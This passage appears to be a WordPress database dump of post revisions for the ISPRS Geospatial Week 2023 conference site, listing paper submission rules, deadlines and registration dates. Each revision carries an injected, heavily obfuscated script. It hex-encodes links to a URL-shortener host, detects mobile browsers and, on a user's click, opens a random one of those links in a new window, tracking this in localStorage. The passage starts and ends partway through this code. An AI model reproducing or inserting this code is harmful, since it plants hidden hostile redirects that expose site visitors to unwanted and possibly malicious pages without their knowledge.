m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-01-30 07:10:26','2023-01-30 07:10:26','',2659,'https://gsw2023.com/?p=3668',0,'revision','',0),
(3669,1,'2023-01-30 07:11:16','2023-01-30 07:11:16','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\">\n<h1><b>Important Dates:</b></h1>\n</div>\n<h4>1. Annales (Fully Reviewed Papers):</h4>\n<h6> Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</h6>\n<h6> Full paper Author notification: May 1, 2023</h6>\n<h6> Camera ready paper submission: June 1, 2023</h6>\n<h4></h4>\n<h4>\n2. Archives (Abstract Reviewed Papers):</h4>\n<h6> Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</h6>\n<h6> Abstracts Author notification: May 15, 2023</h6>\n<h6> Camera ready paper submission: June 1, 2023</h6>\n</div>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpLast\">\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<h4><b>Registration deadlines</b></h4>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpFirst\"><span style=\"font-size: 14pt;\">• Early bird registration deadline: May 1, 2023</span></p>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpLast\"><span style=\"font-size: 14pt;\">• Late registration deadline: July 1, 2023</span></p>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-01-30 07:11:16','2023-01-30 07:11:16','',2659,'https://gsw2023.com/?p=3669',0,'revision','',0),
(3670,1,'2023-02-02 06:24:51','2023-02-02 06:24:51','<p>[vc_row][vc_column][dt_portfolio_masonry content_alignment=\"center\" image_border_radius=\"10px\" image_paddings=\"15px 0px 15px 0px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"off\" show_link=\"n\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"69\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 